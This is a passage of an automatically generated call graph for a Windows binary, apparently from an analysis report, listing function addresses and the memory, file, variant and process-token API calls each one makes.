76291->76178 76292->76122 76293->76124 76294->76144 76295->76162 76296->76169 76297->76172 76298->76168 76299->76139 76300->76131 76301->76134 76302->76242 76303->76249 76304->76254 76305->76254 76306->76254 76307->76254 76308->76260 76309->76253 76310->76268 76313 a17f14 76311->76313 76315 a17ef7 76311->76315 76312 a17193 free 76312->76315 76313->76198 76315->76312 76315->76313 76352 9f1e40 free 76315->76352 76317 9f2e04 2 API calls 76316->76317 76318 a17103 76317->76318 76318->76198 76320 a17a4a __EH_prolog 76319->76320 76353 9f361b 6 API calls 2 library calls 76320->76353 76322 a17a78 76354 9f361b 6 API calls 2 library calls 76322->76354 76324 a17b20 76356 a22db9 free ctype 76324->76356 76326 a17b2b 76357 a22db9 free ctype 76326->76357 76328 a17b37 76328->76198 76329 9f2e04 malloc _CxxThrowException 76331 a17a83 76329->76331 76330 9f2fec 3 API calls 76330->76331 76331->76324 76331->76329 76331->76330 76332 9f2fec 3 API calls 76331->76332 76333 a304d2 5 API calls 76331->76333 76336 9f1e40 free ctype 76331->76336 76355 a17955 malloc _CxxThrowException __EH_prolog ctype 76331->76355 76334 a17aca wcscmp 76332->76334 76333->76331 76334->76331 76336->76331 76337->76198 76339 a304d2 5 API calls 76338->76339 76340 a012ad 76339->76340 76341 9f1e0c ctype 2 API calls 76340->76341 76342 a012b4 76341->76342 76342->76198 76343->76198 76345 a1719d __EH_prolog 76344->76345 76358 a22db9 free ctype 76345->76358 76347 a171b3 76359 a171d5 free __EH_prolog ctype 76347->76359 76349 a171bf 76360 9f1e40 free 76349->76360 76351 a171c7 76351->76198 76352->76315 76353->76322 76354->76331 76355->76331 76356->76326 76357->76328 76358->76347 76359->76349 76360->76351 76361 a30343 76366 a3035f 76361->76366 76365 a30358 76367 a30369 __EH_prolog 76366->76367 76383 a0139e 76367->76383 76372 a30143 ctype free 76373 a3039a 76372->76373 76393 9f1e40 free 76373->76393 76375 a303a2 76394 9f1e40 free 76375->76394 76377 a303aa 76395 a303d8 76377->76395 76382 9f1e40 free 76382->76365 76384 a013b3 76383->76384 76385 a013ae 76383->76385 76387 a301c4 76384->76387 76411 a87ea0 SetEvent GetLastError 76385->76411 76388 a301ce __EH_prolog 76387->76388 76389 a30203 76388->76389 76413 9f1e40 free 76388->76413 76412 9f1e40 free 76389->76412 76391 a3020b 76391->76372 76393->76375 76394->76377 76396 a303e2 __EH_prolog 76395->76396 76397 a0139e ctype 2 API calls 76396->76397 76398 a303fb 76397->76398 76414 a87d50 76398->76414 76400 a30403 76401 a87d50 ctype 2 API calls 76400->76401 76402 a3040b 76401->76402 76403 a87d50 ctype 2 API calls 76402->76403 76404 a303b7 76403->76404 76405 a3004a 76404->76405 76406 a30054 __EH_prolog 76405->76406 76420 9f1e40 free 76406->76420 76408 a30067 76421 9f1e40 free 76408->76421 76410 a3006f 76410->76365 76410->76382 76411->76384 76412->76391 76413->76388 76415 a87d59 CloseHandle 76414->76415 76416 a87d7b 76414->76416 76417 a87d64 GetLastError 76415->76417 76418 a87d75 76415->76418 76416->76400 76417->76416 76419 a87d6e 76417->76419 76418->76416 76419->76400 76420->76408 76421->76410 76422 a76bc6 76423 a76bcd 76422->76423 76424 a76bca 76422->76424 76423->76424 76425 a76bd1 malloc 76423->76425 76425->76424 76426 9fc3bd 76427 9fc3ca 76426->76427 76429 9fc3db 76426->76429 76427->76429 76430 9f1e40 free 76427->76430 76430->76429 76431 a1d3c2 76432 a1d3e9 76431->76432 76433 9f965d VariantClear 76432->76433 76434 a1d42a 76433->76434 76435 a1d883 2 API calls 76434->76435 76436 a1d4b1 76435->76436 76522 a18d4a 76436->76522 76439 a18b05 VariantClear 76442 a1d4e3 76439->76442 76440 a12a72 2 API calls 76441 a1d54c 76440->76441 76443 9f2fec 3 API calls 76441->76443 76442->76440 76444 a1d594 76443->76444 76445 a1d742 76444->76445 76446 a1d5cd 76444->76446 76554 a1cd49 malloc _CxxThrowException free 76445->76554 76448 a1d7d9 76446->76448 76539 a19317 76446->76539 76557 9f1e40 free 76448->76557 76449 a1d754 76452 9f2fec 3 API calls 76449->76452 76455 a1d763 76452->76455 76453 a1d7e1 76558 9f1e40 free 76453->76558 76555 9f1e40 free 76455->76555 76457 a1d5f1 76458 a304d2 5 API calls 76457->76458 76461 a1d5f9 76458->76461 76460 a1d7e9 76463 a1326b free 76460->76463 76545 a1e332 76461->76545 76462 a1d76b 76556 9f1e40 free 76462->76556 76473 a1d69a 76463->76473 76467 a1d773 76469 a1326b free 76467->76469 76469->76473 76470 a1d610 76552 9f1e40 free 76470->76552 76472 a1d618 76474 a1326b free 76472->76474 76475 a1d2a8 76474->76475 76475->76473 76497 a1d883 76475->76497 76478 9f2fec 3 API calls 76479 a1d361 76478->76479 76480 9f2fec 3 API calls 76479->76480 76481 a1d36d 76480->76481 76509 a1d0e1 76481->76509 76483 a1d380 76484 a1d665 76483->76484 76485 a1d38a 76483->76485 76487 a1d68b 76484->76487 76553 a1cd49 malloc _CxxThrowException free 76484->76553 76486 a304d2 5 API calls 76485->76486 76489 a1d392 76486->76489 76488 a1326b free 76487->76488 76488->76473 76492 a1e332 2 API calls 76489->76492 76491 a1d67c 76493 9f2fec 3 API calls 76491->76493 76494 a1d3a1 76492->76494 76493->76487 76495 a1326b free 76494->76495 76496 a1d3b0 76495->76496 76498 a1d88d __EH_prolog 76497->76498 76499 9f2e04 2 API calls 76498->76499 76500 a1d8c6 76499->76500 76501 9f2e04 2 API calls 76500->76501 76502 a1d8d2 76501->76502 76503 9f2e04 2 API calls 76502->76503 76504 a1d8de 76503->76504 76505 a12b63 2 API calls 76504->76505 76506 a1d8fa 76505->76506 76507 a12b63 2 API calls 76506->76507 76508 a1d34f 76507->76508 76508->76478 76510 a1d0eb __EH_prolog 76509->76510 76511 a1d138 76510->76511 76512 a1d10b 76510->76512 76514 9f1e0c ctype 2 API calls 76511->76514 76515 a1d112 76511->76515 76513 9f1e0c ctype 2 API calls 76512->76513 76513->76515 76516 a1d14b 76514->76516 76515->76483 76517 9f2fec 3 API calls 76516->76517 76518 a1d17b 76517->76518 76559 9f7b41 28 API calls 76518->76559 76520 a1d18a 76520->76515 76560 9f757d GetLastError 76520->76560 76527 a18d54 __EH_prolog 76522->76527 76523 a18e15 76526 a18e2d 76523->76526 76529 a18e21 76523->76529 76530 a18e5e 76523->76530 76524 a18e09 76525 9f965d VariantClear 76524->76525 76528 a18e11 76525->76528 76526->76530 76531 a18e2b 76526->76531 76537 a18da4 76527->76537 76561 9f2b55 malloc _CxxThrowException free _CxxThrowException ctype 76527->76561 76528->76439 76562 9f3097 malloc _CxxThrowException free SysStringLen ctype 76529->76562 76532 9f965d VariantClear 76530->76532 76535 9f965d VariantClear 76531->76535 76532->76528 76536 a18e47 76535->76536 76536->76528 76563 a18e7c 6 API calls __EH_prolog 76536->76563 76537->76523 76537->76524 76537->76528 76540 a19321 __EH_prolog 76539->76540 76544 a19360 76540->76544 76564 9f9686 VariantClear 76540->76564 76541 9f965d VariantClear 76542 a193d0 76541->76542 76542->76448 76542->76457 76544->76541 76546 a1e33c __EH_prolog 76545->76546 76547 9f1e0c ctype 2 API calls 76546->76547 76548 a1e34a 76547->76548 76549 a1d608 76548->76549 76565 a1e3d1 malloc _CxxThrowException __EH_prolog 76548->76565 76551 9f1e40 free 76549->76551 76551->76470 76552->76472 76553->76491 76554->76449 76555->76462 76556->76467 76557->76453 76558->76460 76559->76520 76560->76515 76561->76537 76562->76531 76563->76528 76564->76544 76565->76549 76566 a1a7c5 76569 a1a7e9 76566->76569 76575 a1a96b 76566->76575 76567 a1ade3 76671 9f1e40 free 76567->76671 76568 a1a952 76568->76575 76652 a1e0b0 6 API calls 76568->76652 76569->76568 76593 a304d2 5 API calls 76569->76593 76651 a1e0b0 6 API calls 76569->76651 76571 a1adeb 76672 9f1e40 free 76571->76672 76575->76567 76591 a1ac1e 76575->76591 76599 a1ac6c 76575->76599 76613 a1ad88 76575->76613 76618 a1ad17 76575->76618 76619 a1acbc 76575->76619 76633 a0101c 76575->76633 76636 a198f2 76575->76636 76642 a1cc6f 76575->76642 76653 a19531 5 API calls __EH_prolog 76575->76653 76654 a180c1 malloc _CxxThrowException __EH_prolog 76575->76654 76655 a1c820 5 API calls 2 library calls 76575->76655 76656 a1814d 6 API calls 76575->76656 76657 a18125 free ctype 76575->76657 76576 a1ae99 76577 9f1e0c ctype 2 API calls 76576->76577 76581 a1aea9 memset memset 76577->76581 76580 a1adf3 76580->76576 76585 a304d2 malloc _CxxThrowException free _CxxThrowException memcpy 76580->76585 76584 a1aedd 76581->76584 76582 a1ac26 76659 9f1e40 free 76582->76659 76673 9f1e40 free 76584->76673 76585->76580 76589 a1aee5 76674 9f1e40 free 76589->76674 76658 9f1e40 free 76591->76658 76592 a1aef0 76675 9f1e40 free 76592->76675 76593->76569 76597 a1c430 76677 9f1e40 free 76597->76677 76660 9f1e40 free 76599->76660 76600 a1c438 76678 9f1e40 free 76600->76678 76603 a1c443 76679 9f1e40 free 76603->76679 76605 a1ac85 76661 9f1e40 free 76605->76661 76607 a1c44e 76680 9f1e40 free 76607->76680 76610 a1ac2e 76676 9f1e40 free 76610->76676 76611 a1c459 76668 a18125 free ctype 76613->76668 76617 a1ad93 76669 9f1e40 free 76617->76669 76665 a18125 free ctype 76618->76665 76662 a18125 free ctype 76619->76662 76623 a1ad3c 76666 9f1e40 free 76623->76666 76624 a1adac 76670 9f1e40 free 76624->76670 76625 a1acc7 76663 9f1e40 free 76625->76663 76629 a1ace0 76664 9f1e40 free 76629->76664 76630 a1ad55 76667 9f1e40 free 76630->76667 76635 9fb95a 6 API calls 76633->76635 76634 a01028 76634->76575 76635->76634 76637 a198fc __EH_prolog 76636->76637 76681 a19987 76637->76681 76639 a19970 76639->76575 76641 a19911 76641->76639 76685 a1ef8d 12 API calls 2 library calls 76641->76685 76725 a3f445 76642->76725 76731 a35505 76642->76731 76735 a3cf91 76642->76735 76643 a1cc8b 76647 a1cccb 76643->76647 76743 a1979e VariantClear __EH_prolog 76643->76743 76645 a1ccb1 76645->76647 76744 a1cae9 VariantClear 76645->76744 76647->76575 76651->76569 76652->76575 76653->76575 76654->76575 76655->76575 76656->76575 76657->76575 76658->76582 76659->76610 76660->76605 76661->76610 76662->76625 76663->76629 76664->76610 76665->76623 76666->76630 76667->76610 76668->76617 76669->76624 76670->76610 76671->76571 76672->76580 76673->76589 76674->76592 76675->76610 76676->76597 76677->76600 76678->76603 76679->76607 76680->76611 76682 a19991 __EH_prolog 76681->76682 76686 a480aa 76682->76686 76683 a199a8 76683->76641 76685->76639 76687 a480b4 __EH_prolog 76686->76687 76688 9f1e0c ctype 2 API calls 76687->76688 76689 a480bf 76688->76689 76690 a480d3 76689->76690 76692 a3bdb5 76689->76692 76690->76683 76693 a3bdbf __EH_prolog 76692->76693 76698 a3be69 76693->76698 76695 a3bdef 76696 9f2e04 2 API calls 76695->76696 76697 a3be16 76696->76697 76697->76690 76699 a3be73 __EH_prolog 76698->76699 76702 a35e2b 76699->76702 76701 a3be7f 76701->76695 76703 a35e35 __EH_prolog 76702->76703 76708 a308b6 76703->76708 76705 a35e41 76713 a0dfc9 malloc _CxxThrowException __EH_prolog 76705->76713 76707 a35e57 76707->76701 76714 9f9c60 76708->76714 76710 a308c4 76719 9f9c8f GetModuleHandleA GetProcAddress 76710->76719 76712 a308f3 __aulldiv 76712->76705 76713->76707 76724 9f9c4d GetCurrentProcess GetProcessAffinityMask 76714->76724 76716 9f9c6e 76717 9f9c80 GetSystemInfo 76716->76717 76718 9f9c79 76716->76718 76717->76710 76718->76710 76720 9f9cef GlobalMemoryStatus 76719->76720 76721 9f9cc4 GlobalMemoryStatusEx 76719->76721 76722 9f9d08 76720->76722 76721->76720 76723 9f9cce 76721->76723 76722->76723 76723->76712 76724->76716 76726 a3f455 76725->76726 76745 a01092 76726->76745 76729 a3f478 76729->76643 76732 a3550f __EH_prolog 76731->76732 76761 a34e8a 76732->76761 76736 a3cf9b __EH_prolog 76735->76736 76737 a3f445 14 API calls 76736->76737 76738 a3d018 76737->76738 76741 a3d01f 76738->76741 76977 a41511 76738->76977 76740 a3d08b 76740->76741 76983 a42c5d 11 API calls 2 library calls 76740->76983 76741->76643 76743->76645 76744->76647 76747 9fb95a 6 API calls 76745->76747 76746 a010aa 76746->76729 76748 a3f1b2 76746->76748 76747->76746 76749 a3f1bc __EH_prolog 76748->76749 76758 a01168 76749->76758 76751 a3f1d3 76752 a3f231 memcpy 76751->76752 76753 a3f21c _CxxThrowException 76751->76753 76754 a3f1e6 76751->76754 76756 a3f24c 76752->76756 76753->76752 76754->76729 76755 a3f2f0 memmove 76755->76756 76756->76754 76756->76755 76757 a3f31a memcpy 76756->76757 76757->76754 76759 a0111c 10 API calls 76758->76759 76760 a0117b 76759->76760 76760->76751 76762 a34e94 __EH_prolog 76761->76762 76763 9f2e04 2 API calls 76762->76763 76866 a34f1d 76762->76866 76764 a34ed7 76763->76764 76893 a07fc5 76764->76893 76766 a34f37 76769 a34f63 76766->76769 76770 a34f41 76766->76770 76767 a34f0a 76768 9f965d VariantClear 76767->76768 76772 a34f15 76768->76772 76771 9f2f88 3 API calls 76769->76771 76773 9f965d VariantClear 76770->76773 76775 a34f71 76771->76775 76914 9f1e40 free 76772->76914 76774 a34f4c 76773->76774 76915 9f1e40 free 76774->76915 76778 9f965d VariantClear 76775->76778 76779 a34f80 76778->76779 76916 a05bcf malloc _CxxThrowException 76779->76916 76781 a34f9a 76782 9f2e47 2 API calls 76781->76782 76783 a34fad 76782->76783 76784 9f2f1c 2 API calls 76783->76784 76785 a34fbd 76784->76785 76786 9f2e04 2 API calls 76785->76786 76787 a34fd1 76786->76787 76788 9f2e04 2 API calls 76787->76788 76796 a34fdd 76788->76796 76789 a35404 76955 9f1e40 free 76789->76955 76791 a3540c 76956 9f1e40 free 76791->76956 76793 a35414 76957 9f1e40 free 76793->76957 76796->76789 76917 a05bcf malloc _CxxThrowException 76796->76917 76797 a35099 76799 9f2da9 2 API calls 76797->76799 76798 a3541c 76958 9f1e40 free 76798->76958 76801 a350a9 76799->76801 76804 9f2fec 3 API calls 76801->76804 76802 a35424 76959 9f1e40 free 76802->76959 76805 a350b6 76804->76805 76918 9f1e40 free 76805->76918 76806 a3542c 76960 9f1e40 free 76806->76960 76809 a350be 76919 9f1e40 free 76809->76919 76811 a350cd 76812 9f2f88 3 API calls 76811->76812 76813 a350e3 76812->76813 76814 a350f1 76813->76814 76815 a35100 76813->76815 76816 9f30ea 3 API calls 76814->76816 76920 9f3044 malloc _CxxThrowException free ctype 76815->76920 76818 a350fe 76816->76818 76921 a01029 6 API calls 76818->76921 76820 a3511a 76821 a35120 76820->76821 76822 a3516b 76820->76822 76922 9f1e40 free 76821->76922 76928 a0089e malloc _CxxThrowException free _CxxThrowException memcpy 76822->76928 76825 a35128 76923 9f1e40 free 76825->76923 76826 a35187 76829 a304d2 5 API calls 76826->76829 76828 a35130 76924 9f1e40 free 76828->76924 76831 a351ba 76829->76831 76929 a30516 malloc _CxxThrowException ctype 76831->76929 76832 a35138 76925 9f1e40 free 76832->76925 76835 a351c5 76840 a351f5 76835->76840 76841 a3522d 76835->76841 76836 a35140 76926 9f1e40 free 76836->76926 76838 a35148 76927 9f1e40 free 76838->76927 76930 9f1e40 free 76840->76930 76842 9f2e04 2 API calls 76841->76842 76888 a35235 76842->76888 76844 a351fd 76931 9f1e40 free 76844->76931 76847 a35205 76932 9f1e40 free 76847->76932 76848 a3532e 76941 9f1e40 free 76848->76941 76850 a3520d 76933 9f1e40 free 76850->76933 76853 a35347 76853->76789 76855 a35358 76853->76855 76854 a35215 76934 9f1e40 free 76854->76934 76942 9f1e40 free 76855->76942 76857 a353a3 76948 9f1e40 free 76857->76948 76859 a35360 76943 9f1e40 free 76859->76943 76860 a3521d 76935 9f1e40 free 76860->76935 76864 a35368 76944 9f1e40 free 76864->76944 76866->76643 76868 a353bc 76949 9f1e40 free 76868->76949 76869 a35370 76945 9f1e40 free 76869->76945 76873 a353c4 76950 9f1e40 free 76873->76950 76874 a35378 76946 9f1e40 free 76874->76946 76876 a304d2 5 API calls 76876->76888 76878 a353cc 76951 9f1e40 free 76878->76951 76879 a35380 76947 9f1e40 free 76879->76947 76883 a353d4 76952 9f1e40 free 76883->76952 76885 a353dc 76953 9f1e40 free 76885->76953 76887 a353e4 76954 9f1e40 free 76887->76954 76888->76848 76888->76857 76888->76876 76891 9f2e04 2 API calls 76888->76891 76936 a3545c 5 API calls 2 library calls 76888->76936 76937 a01029 6 API calls 76888->76937 76938 a0089e malloc _CxxThrowException free _CxxThrowException memcpy 76888->76938 76939 a30516 malloc _CxxThrowException ctype 76888->76939 76940 9f1e40 free 76888->76940 76891->76888 76894 a07fcf __EH_prolog 76893->76894 76896 a07ff4 76894->76896 76897 a0805c 76894->76897 76898 a08061 76894->76898 76899 a08019 76894->76899 76895 a0800a 76970 9f9736 VariantClear 76895->76970 76896->76895 76961 9f950d 76896->76961 76969 9f9630 VariantClear 76897->76969 76898->76897 76911 a08025 76898->76911 76899->76896 76901 a0801e 76899->76901 76905 a08042 76901->76905 76906 a08022 76901->76906 76902 a080b8 76904 9f965d VariantClear 76902->76904 76908 a080c0 76904->76908 76967 9f9597 VariantClear 76905->76967 76909 a08032 76906->76909 76906->76911 76908->76766 76908->76767 76966 9f9604 VariantClear 76909->76966 76911->76895 76968 9f95df VariantClear 76911->76968 76914->76866 76915->76866 76916->76781 76917->76797 76918->76809 76919->76811 76920->76818 76921->76820 76922->76825 76923->76828 76924->76832 76925->76836 76926->76838 76927->76866 76928->76826 76929->76835 76930->76844 76931->76847 76932->76850 76933->76854 76934->76860 76935->76866 76936->76888 76937->76888 76938->76888 76939->76888 76940->76888 76941->76853 76942->76859 76943->76864 76944->76869 76945->76874 76946->76879 76947->76866 76948->76868 76949->76873 76950->76878 76951->76883 76952->76885 76953->76887 76954->76866 76955->76791 76956->76793 76957->76798 76958->76802 76959->76806 76960->76866 76971 9f9767 76961->76971 76963 9f9518 SysAllocStringLen 76964 9f954f 76963->76964 76965 9f9539 _CxxThrowException 76963->76965 76964->76895 76965->76964 76966->76895 76967->76895 76968->76895 76969->76895 76970->76902 76972 9f9779 76971->76972 76973 9f9770 76971->76973 76976 9f9686 VariantClear 76972->76976 76973->76963 76975 9f9780 76975->76963 76976->76975 76978 a4151b __EH_prolog 76977->76978 76984 a410d3 76978->76984 76981 a41552 _CxxThrowException 76981->76740 76982 a41589 76981->76982 76982->76740 76983->76741 76985 a410dd __EH_prolog 76984->76985 76986 a3d1b7 free 76985->76986 76987 a410f2 76986->76987 76988 a412ef 76987->76988 76992 a01168 10 API calls 76987->76992 76997 a411f4 76987->76997 76988->76981 76988->76982 76989 a4139e 76989->76988 76990 a413c4 76989->76990 76993 9f1e0c ctype 2 API calls 76989->76993 76991 a01168 10 API calls 76990->76991 76994 a413da 76991->76994 76992->76997 76993->76990 76998 a413f9 76994->76998 77008 a413de 76994->77008 77051 a3ef67 _CxxThrowException 76994->77051 76997->76988 77015 9fb95a 6 API calls 76997->77015 77016 a3f047 76998->77016 77001 a414ba 77055 a40943 50 API calls 2 library calls 77001->77055 77002 a41450 77020 a406ae 77002->77020 77006 a414e7 77056 a22db9 free ctype 77006->77056 77057 9f1e40 free 77008->77057 77011 a4148e 77012 a3f047 _CxxThrowException 77011->77012 77013 a414ac 77012->77013 77013->77001 77054 a3ef67 _CxxThrowException 77013->77054 77015->76989 77017 a3f063 77016->77017 77018 a3f072 77017->77018 77058 a3ef67 _CxxThrowException 77017->77058 77018->77001 77018->77002 77052 a3ef67 _CxxThrowException 77018->77052 77021 a406b8 __EH_prolog 77020->77021 77059 a403f4 77021->77059 77023 a40877 77025 a3b8dc ctype free 77023->77025 77024 a012a5 5 API calls 77049 a40715 77024->77049 77026 a408a6 77025->77026 77089 9f1e40 free 77026->77089 77028 a408e3 _CxxThrowException 77030 a408f7 77028->77030 77029 a408ae 77090 9f1e40 free 77029->77090 77034 a3b8dc ctype free 77030->77034 77032 9f429a 3 API calls 77032->77049 77033 a408b6 77091 9f1e40 free 77033->77091 77035 a40914 77034->77035 77093 9f1e40 free 77035->77093 77036 9f1e0c ctype 2 API calls 77036->77049 77039 a408be 77092 a3c149 free ctype 77039->77092 77040 a4091c 77094 9f1e40 free 77040->77094 77043 a408d0 77043->77006 77043->77011 77053 a3ef67 _CxxThrowException 77043->77053 77044 a40924 77095 9f1e40 free 77044->77095 77046 a381ec 29 API calls 77046->77049 77047 a4092c 77096 a3c149 free ctype 77047->77096 77049->77023 77049->77024 77049->77028 77049->77030 77049->77032 77049->77036 77049->77046 77050 a3ef67 _CxxThrowException 77049->77050 77050->77049 77051->76998 77052->77002 77053->77011 77054->77001 77055->77006 77056->77008 77057->76988 77058->77018 77060 a3f047 _CxxThrowException 77059->77060 77061 a40407 77060->77061 77062 a3f047 _CxxThrowException 77061->77062 77063 a40475 77061->77063 77067 a40421 77062->77067 77078 a4049a 77063->77078 77100 a3fa3f 22 API calls 2 library calls 77063->77100 77065 a404b8 77066 a404e8 77065->77066 77072 a404cd 77065->77072 77103 a47c4a malloc _CxxThrowException free ctype 77066->77103 77068 a4043e 77067->77068 77097 a3ef67 _CxxThrowException 77067->77097 77098 a3f93c 7 API calls 2 library calls 77068->77098 77069 a40492 77074 a3f047 _CxxThrowException 77069->77074 77102 a3fff0 9 API calls 2 library calls 77072->77102 77074->77078 77076 a404db 77081 a3f047 _CxxThrowException 77076->77081 77078->77065 77101 a4159a malloc _CxxThrowException free ctype 77078->77101 77079 a404e3 77085 a4054a 77079->77085 77105 a3ef67 _CxxThrowException 77079->77105 77080 a40446 77082 a4046d 77080->77082 77099 a3ef67 _CxxThrowException 77080->77099 77081->77079 77084 a3f047 _CxxThrowException 77082->77084 77083 a404f3 77083->77079 77104 a0089e malloc _CxxThrowException free _CxxThrowException memcpy 77083->77104 77084->77063 77085->77049 77089->77029 77090->77033 77091->77039 77092->77043 77093->77040 77094->77044 77095->77047 77096->77043 77097->77068 77098->77080 77099->77082 77100->77069 77101->77065 77102->77076 77103->77083 77104->77083 77105->77085 77106 a1d948 77136 a1dac7 77106->77136 77108 a1d94f 77109 9f2e04 2 API calls 77108->77109 77110 a1d97b 77109->77110 77111 9f2e04 2 API calls 77110->77111 77112 a1d987 77111->77112 77116 a1d9e7 77112->77116 77144 9f6404 77112->77144 77117 a1da0f 77116->77117 77134 a1da36 77116->77134 77169 9f1e40 free 77117->77169 77120 a1d9bf 77167 9f1e40 free 77120->77167 77121 a1da94 77173 9f1e40 free 77121->77173 77122 a1da17 77170 9f1e40 free 77122->77170 77126 a1d9c7 77168 9f1e40 free 77126->77168 77127 a1da9c 77174 9f1e40 free 77127->77174 77128 9f2da9 2 API calls 77128->77134 77131 a1d9cf 77132 a304d2 5 API calls 77132->77134 77134->77121 77134->77128 77134->77132 77171 9f1524 malloc _CxxThrowException __EH_prolog ctype 77134->77171 77172 9f1e40 free 77134->77172 77137 a1dad1 __EH_prolog 77136->77137 77138 9f2e04 2 API calls 77137->77138 77139 a1db33 77138->77139 77140 9f2e04 2 API calls 77139->77140 77141 a1db3f 77140->77141 77142 9f2e04 2 API calls 77141->77142 77143 a1db55 77142->77143 77143->77108 77145 9f631f 9 API calls 77144->77145 77146 9f6414 77145->77146 77147 9f6423 77146->77147 77148 9f2f88 3 API calls 77146->77148 77149 9f2f88 3 API calls 77147->77149 77148->77147 77150 9f643d 77149->77150 77151 a07e5a 77150->77151 77152 a07e64 __EH_prolog 77151->77152 77175 a08179 77152->77175 77155 a17ebb free 77156 a07e7f 77155->77156 77157 9f2fec 3 API calls 77156->77157 77158 a07e9a 77157->77158 77159 9f2da9 2 API calls 77158->77159 77160 a07ea7 77159->77160 77161 9f6c72 44 API calls 77160->77161 77162 a07eb7 77161->77162 77180 9f1e40 free 77162->77180 77164 a07ecb 77165 a07ed8 77164->77165 77181 9f757d GetLastError 77164->77181 77165->77116 77165->77120 77167->77126 77168->77131 77169->77122 77170->77131 77171->77134 77172->77134 77173->77127 77174->77131 77176 a08906 77175->77176 77178 a07e77 77176->77178 77182 a08804 free ctype 77176->77182 77183 9f1e40 free 77176->77183 77178->77155 77180->77164 77181->77165 77182->77176 77183->77176 77184 a2acd3 77185 a2ace0 77184->77185 77186 a2acf1 77184->77186 77185->77186 77190 a2acf8 77185->77190 77195 a2c0b3 __EH_prolog 77190->77195 77191 a2c0ed 77199 9f1e40 free 77191->77199 77193 a2aceb 77197 9f1e40 free 77193->77197 77194 a17193 free 77194->77195 77195->77191 77195->77194 77198 9f1e40 free 77195->77198 77197->77186 77198->77195 77199->77193 77200 a769d0 77201 a769d7 malloc 77200->77201 77202 a769d4 77200->77202 77204 a01ade 77205 a01ae8 __EH_prolog 77204->77205 77255 9f13f5 77205->77255 77208 a01b32 6 API calls 77209 a01b8d 77208->77209 77219 a01bf8 77209->77219 77273 a01ea4 9 API calls 77209->77273 77211 a01b24 _CxxThrowException 77211->77208 77213 a01bdf 77214 9f27bb 3 API calls 77213->77214 77215 a01bec 77214->77215 77274 9f1e40 free 77215->77274 77217 a01c89 77269 a01eb9 77217->77269 77219->77217 77275 a11d73 5 API calls __EH_prolog 77219->77275 77223 a01cb2 _CxxThrowException 77223->77217 77256 9f13ff __EH_prolog 77255->77256 77257 a17ebb free 77256->77257 77258 9f142b 77257->77258 77259 9f1438 77258->77259 77276 9f1212 free ctype 77258->77276 77261 9f1e0c ctype 2 API calls 77259->77261 77264 9f144d 77261->77264 77262 9f14f4 77262->77208 77272 a11d73 5 API calls __EH_prolog 77262->77272 77263 a304d2 5 API calls 77263->77264 77264->77262 77264->77263 77267 9f1507 77264->77267 77277 9f1265 5 API calls 2 library calls 77264->77277 77278 9f1524 malloc _CxxThrowException __EH_prolog ctype 77264->77278 77268 9f2fec 3 API calls 77267->77268 77268->77262 77279 9f9313 GetCurrentProcess OpenProcessToken 77269->77279 77272->77211 77273->77213 77274->77219 77275->77223 77276->77259 77277->77264 77278->77264 77280 9f933a LookupPrivilegeValueW 77279->77280 77281 9f9390 77279->77281 77282 9f934c AdjustTokenPrivileges 77280->77282 77283 9f9382 77280->77283 77282->77283 77284 9f9372 GetLastError 77282->77284 77285 9f9385 CloseHandle 77283->77285 77284->77285 77285->77281 77286 9f7b20 77289 9f7ab2 77286->77289 77290 9f7ac5 77289->77290 77297 9f759a 77290->77297 77293 9f7b03 77311 9f7919 77293->77311 77294 9f7aeb SetFileTime 77294->77293 77298 9f75a4 __EH_prolog 77297->77298 77299 9f764c CloseHandle 77298->77299 77301 9f75af 77299->77301 77300 9f7632 77300->77293 77300->77294 77301->77300 77302 9f75e9 77301->77302 77303 9f75d4 CreateFileW 77301->77303 77302->77300 77304 9f2e04 2 API calls 77302->77304 77303->77302 77305 9f75fb 77304->77305 77327 9f8b4a 77305->77327 77307 9f7611 77308 9f762a 77307->77308 77309 9f7615 CreateFileW 77307->77309 77332 9f1e40 free 77308->77332 77309->77308 77312 9f7aac 77311->77312 77313 9f793c 77311->77313 77313->77312 77314 9f7945 DeviceIoControl 77313->77314 77315 9f7969 77314->77315 77316 9f79e6 77314->77316 77315->77316 77323 9f79a7 77315->77323 77317 9f79ef DeviceIoControl 77316->77317 77320 9f7a14 77316->77320 77318 9f7a22 DeviceIoControl 77317->77318 77317->77320 77319 9f7a44 DeviceIoControl 77318->77319 77318->77320 77319->77320 77320->77312 77451 9f780d 8 API calls ctype 77320->77451 77322 9f7aa5 77324 9f77de 5 API calls 77322->77324 77450 9f9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 77323->77450 77324->77312 77326 9f79d0 77326->77316 77333 9f8b80 77327->77333 77329 9f8b6e 77329->77307 77331 9f2f88 3 API calls 77331->77329 77332->77300 77335 9f8b8a __EH_prolog 77333->77335 77334 9f8b55 77334->77329 77334->77331 77335->77334 77336 9f8c7b 77335->77336 77343 9f8be1 77335->77343 77337 9f8d23 77336->77337 77339 9f8c8f 77336->77339 77338 9f8e8a 77337->77338 77340 9f8d3b 77337->77340 77341 9f2e47 2 API calls 77338->77341 77339->77340 77346 9f8c9e 77339->77346 77342 9f2e04 2 API calls 77340->77342 77344 9f8e96 77341->77344 77345 9f8d43 77342->77345 77343->77334 77347 9f2e47 2 API calls 77343->77347 77351 9f2e47 2 API calls 77344->77351 77430 9f6332 6 API calls 2 library calls 77345->77430 77350 9f2e47 2 API calls 77346->77350 77348 9f8c05 77347->77348 77355 9f8c17 77348->77355 77356 9f8c24 77348->77356 77363 9f8ca7 77350->77363 77353 9f8eb8 77351->77353 77352 9f8d52 77354 9f8d56 77352->77354 77431 9f859e malloc _CxxThrowException free _CxxThrowException 77352->77431 77442 9f8f57 memmove 77353->77442 77441 9f1e40 free 77354->77441 77420 9f1e40 free 77355->77420 77361 9f2e47 2 API calls 77356->77361 77360 9f8ec4 77365 9f8ede 77360->77365 77366 9f8ec8 77360->77366 77367 9f8c35 77361->77367 77364 9f2e47 2 API calls 77363->77364 77368 9f8cd0 77364->77368 77445 9f3221 malloc _CxxThrowException free _CxxThrowException 77365->77445 77443 9f1e40 free 77366->77443 77421 9f8f57 memmove 77367->77421 77425 9f8f57 memmove 77368->77425 77373 9f8ed0 77444 9f1e40 free 77373->77444 77374 9f8c41 77378 9f8c6b 77374->77378 77422 9f31e5 malloc _CxxThrowException free _CxxThrowException 77374->77422 77375 9f8eeb 77446 9f31e5 malloc _CxxThrowException free _CxxThrowException 77375->77446 77376 9f8cdc 77381 9f8d13 77376->77381 77426 9f3221 malloc _CxxThrowException free _CxxThrowException 77376->77426 77424 9f1e40 free 77378->77424 77429 9f1e40 free 77381->77429 77382 9f8f06 77447 9f31e5 malloc _CxxThrowException free 